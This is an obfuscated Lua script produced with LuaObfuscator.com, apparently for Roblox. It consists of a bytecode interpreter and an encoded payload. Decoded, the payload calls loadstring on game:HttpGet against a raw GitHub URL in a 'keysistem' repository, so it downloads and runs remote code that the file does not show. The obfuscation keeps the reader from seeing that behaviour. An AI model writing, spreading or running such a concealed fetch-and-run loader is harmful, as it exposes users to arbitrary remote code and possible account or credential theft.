--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v90=0;while true do if (v90==0) then v19=v0(v3(v30,1,1));return "";end end else local v91=v2(v0(v30,16));if v19 then local v111=v5(v91,v19);v19=nil;return v111;else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(1 + 0)) -(v32-(2 -(1 + 0)))) + 1)) ;return v92-(v92%(620 -(555 + 64))) ;else local v93=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v93 + v93))>=v93) and 1) or (927 -(214 + (1590 -(282 + 595)))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(1605 + 32) -(1523 + 114) ;local v36;local v37;while true do if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(16 + 52 + 997)) ;v35=1271 -(226 + 1044) ;end if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(957 -(892 + 65))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v38=(2 -1) -0 ;end if (v38==(351 -(64 + 23 + 263))) then return (v42 * (16777396 -(67 + 113))) + (v41 * 65536) + (v40 * (188 + 68)) + v39 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(953 -(802 + (412 -262)))) then v46=1;v47=(v20(v45,3 -2 ,53 -33 ) * ((3 -1)^(11 + 21))) + v44 ;v43=2 + 0 + 0 ;end if (v43==(1000 -(719 + 196 + 82))) then if (v48==(0 -0)) then if (v47==((1055 -(87 + 968)) + 0)) then return v49 * (0 -0) ;else local v125=0 -0 ;while true do if (v125==(1187 -(1069 + 118))) then v48=2 -1 ;v46=(0 -0) -0 ;break;end end end elseif (v48==(4477 -(2205 + 225))) then return ((v47==(0 + 0)) and (v49 * ((1 -(0 -0))/(0 + (1413 -(447 + 966)))))) or (v49 * NaN) ;end return v8(v49,v48-(1814 -(368 + 423)) ) * (v46 + (v47/((3 -(2 -1))^(163 -111)))) ;end if ((18 -(10 + 8))==v43) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==(444 -((2233 -(1703 + 114)) + 26))) then v48=v20(v45,66 -45 ,106 -(776 -(376 + 325)) );v49=((v20(v45,14 + 18 )==(1914 -(1789 + 124))) and  -(1 -0)) or 1 ;v43=441 -(145 + 293) ;end end end local function v25(v50) local v51;if  not v50 then local v94=(0 -0) -0 ;while true do if (v94==(0 -(14 -(9 + 5)))) then v50=v23();if (v50==0) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;local v52={};for v68=1 + 0 , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104==0) then local v119=(function() return 0;end)();while true do if (v119~=(1 + 0)) then else v104=(function() return 1;end)();break;end if (v119==0) then v95=(function() return 1409 -(450 + 959) ;end)();v96=(function() return nil;end)();v119=(function() return 1;end)();end end end if (v104~=1) then else local v120=(function() return 1990 -(582 + 1408) ;end)();while true do if (v120==(0 -0)) then while true do if (v95~=(0 -0)) then else v96=(function() return v97();end)();if (v98(v96, #":", #".")==(0 -0)) then local v127=(function() return 0;end)();local v128=(function() return;end)();local v129=(function() return;end)();local v130=(function() return;end)();while true do if (v127~=(1825 -(1195 + 629))) then else local v167=(function() return 0;end)();while true do if (v167~=(1 -0)) then else v127=(function() return 243 -(187 + 54) ;end)();break;end if (v167~=0) then else v130=(function() return {v99(),v99(),nil,nil};end)();if (v128==0) then local v180=(function() return 780 -(162 + 618) ;end)();local v181=(function() return;end)();while true do if (v180==0) then v181=(function() return 0;end)();while true do if (v181==0) then v130[ #"-19"]=(function() return v99();end)();v130[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v128== #"[") then v130[ #"xnx"]=(function() return v100();end)();elseif (v128==(2 + 0)) then v130[ #"gha"]=(function() return v100() -((2 + 0)^(33 -17)) ;end)();elseif (v128== #"gha") then local v187=(function() return 0 -0 ;end)();local v188=(function() return;end)();while true do if ((0 + 0)==v187) then v188=(function() return 1636 -(1373 + 263) ;end)();while true do if (v188~=0) then else v130[ #"xnx"]=(function() return v100() -((1002 -(451 + 549))^16) ;end)();v130[ #"0313"]=(function() return v99();end)();break;end end break;end end end v167=(function() return 1;end)();end end end if (v127==2) then if (v98(v129, #",", #".")~= #".") then else v130[2]=(function() return v101[v130[1 + 1 ]];end)();end if (v98(v129,2 -0 ,2)== #":") then v130[ #"91("]=(function() return v101[v130[ #"nil"]];end)();end v127=(function() return 4 -1 ;end)();end if ((1387 -(746 + 638))==v127) then if (v98(v129, #"-19", #"-19")== #"\\") then v130[ #"asd1"]=(function() return v101[v130[ #"0836"]];end)();end v102[v103]=(function() return v130;end)();break;end if (v127==0) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (0==v169) then v170=(function() return 0;end)();while true do if (v170==0) then local v182=(function() return 0 + 0 ;end)();while true do if (v182~=(0 -0)) then else v128=(function() return v98(v96,2, #"gha");end)();v129=(function() return v98(v96, #"http",347 -(218 + 123) );end)();v182=(function() return 1582 -(1535 + 46) ;end)();end if (v182==(1 + 0)) then v170=(function() return 1;end)();break;end end end if (v170==1) then v127=(function() return 1;end)();break;end end break;end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 0 + 0 ;end)();while true do if (v108~=(560 -(306 + 254))) then else local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if (v121==(0 + 0)) then v122=(function() return 0;end)();while true do if (v122==(0 -0)) then local v126=(function() return 0;end)();while true do if (v126~=(1467 -(899 + 568))) then else v105[v106-#"|" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"]",v59 do local v71=(function() return 0;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v71==0) then local v112=(function() return 0;end)();local v113=(function() return;end)();while true do if (v112==(0 -0)) then v113=(function() return 0;end)();while true do if ((603 -(268 + 335))~=v113) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v113=(function() return 291 -(60 + 230) ;end)();end if (v113==(573 -(426 + 146))) then v71=(function() return 1;end)();break;end end break;end end end if (v71==1) then if (v72== #"[") then v73=(function() return v21()~=0 ;end)();elseif (v72==(1 + 1)) then v73=(function() return v24();end)();elseif (v72== #"nil") then v73=(function() return v25();end)();end v60[v70]=(function() return v73;end)();break;end end end v58[ #"asd"]=(function() return v21();end)();for v74= #"{",v23() do FlatIdent_A9A3,Descriptor,v21,v20,v22,v23,v60,v55,v74=(function() return v53(FlatIdent_A9A3,Descriptor,v21,v20,v22,v23,v60,v55,v74);end)();end for v75= #"|",v23() do v56,v75,v28=(function() return v54(v56,v75,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1457 -(282 + 1174) ];local v66=v62[813 -(330 + 239 + 242) ];local v67=v62[8 -5 ];return function(...) local v76=v65;local v77=v66;local v78=v67;local v79=v27;local v80=1 + 0 + 0 ;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -(1252 -(721 + 530)) ;local v85={};local v86={};for v109=1271 -(945 + 326) ,v84 do if ((v109>=v78) or (2709>=2874)) then v82[v109-v78 ]=v83[v109 + ((2 + 0) -1) ];else v86[v109]=v83[v109 + 1 + 0 ];end end local v87=(v84-v78) + (701 -((397 -(116 + 10)) + 429)) ;local v88;local v89;while true do local v110=0 + 0 ;while true do if (v110==(1501 -(1408 + 92))) then if (v89<=(1093 -(461 + 625))) then if ((343==343) and (v89<=(1291 -(993 + 295)))) then if ((v89<=(1 + 0)) or (4239<=3546)) then if (v89==(1171 -(418 + 753))) then v86[v88[2]]={};else local v132=v88[1 + 0 + 1 ];local v133=v86[v88[1 + 2 ]];v86[v132 + 1 ]=v133;v86[v132]=v133[v88[2 + (740 -(542 + 196)) ]];end elseif (v89>(1 + 1)) then v86[v88[531 -(406 + 123) ]]=v88[1772 -(1749 + 20) ];else do return;end end elseif ((v89<=(2 + 3)) or (4182==1869)) then if (v89==(1326 -(1249 + 73))) then local v139=(0 -0) + 0 ;local v140;local v141;local v142;local v143;while true do if (v139==((335 + 811) -(466 + 679))) then v81=(v142 + v140) -(2 -1) ;v143=0;v139=5 -3 ;end if ((v139==2) or (3244<=2821)) then for v172=v140,v81 do v143=v143 + (1901 -(54 + 52 + 1794)) ;v86[v172]=v141[v143];end break;end if (v139==0) then v140=v88[2];v141,v142=v79(v86[v140](v13(v86,v140 + 1 ,v88[1 + 2 ])));v139=1 + 0 ;end end else do return;end end elseif (v89>(2 + 4)) then local v144=v88[5 -3 ];v86[v144]=v86[v144](v13(v86,v144 + 1 ,v81));else v86[v88[5 -3 ]]=v64[v88[117 -(4 + 110) ]];end elseif (v89<=11) then if ((2996>=2654) and (4630==4630) and (v89<=(593 -(57 + 527)))) then if (v89>(1435 -(41 + (3651 -2265)))) then v86[v88[(269 -164) -(17 + (1637 -(1126 + 425))) ]]=v64[v88[3 + (405 -(118 + 287)) ]];else local v150=v88[3 -1 ];local v151=v86[v88[3]];v86[v150 + (2 -(3 -2)) ]=v151;v86[v150]=v151[v88[4]];end elseif (v89>((1297 -(118 + 1003)) -(122 + 44))) then v86[v88[2 -0 ]]=v88[9 -6 ];else local v157=v88[2 + 0 ];v86[v157]=v86[v157](v13(v86,v157 + 1 + 0 ,v81));end elseif (v89<=(26 -13)) then if (v89==(77 -(30 + 35))) then local v159=v88[2 + 0 ];local v160,v161=v79(v86[v159](v13(v86,v159 + 1 ,v88[3])));v81=(v161 + v159) -(1258 -(1043 + 214)) ;local v162=0 -0 ;for v165=v159,v81 do local v166=0;while true do if ((3978>2104) and (v166==(1212 -((945 -622) + 889)))) then v162=v162 + 1 ;v86[v165]=v160[v162];break;end end end else v86[v88[5 -3 ]]={};end elseif (v89>(594 -(361 + 219))) then v86[v88[322 -(53 + (644 -(142 + 235))) ]]();else v86[v88[2]]();end v80=v80 + 1 + 0 ;break;end if ((2995>1541) and (v110==(413 -(15 + 398)))) then v88=v76[v80];v89=v88[983 -(18 + 964) ];v110=3 -2 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034C3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F706F6B656C6F6B62722F6B657973697374656D2F726566732F68656164732F6D61696E2F7A6F7275706700094Q000D7Q001206000100013Q001206000200023Q00200100020002000300120B000400044Q000C000200044Q000700013Q00022Q000E0001000100012Q00053Q00017Q00",v9(),...);
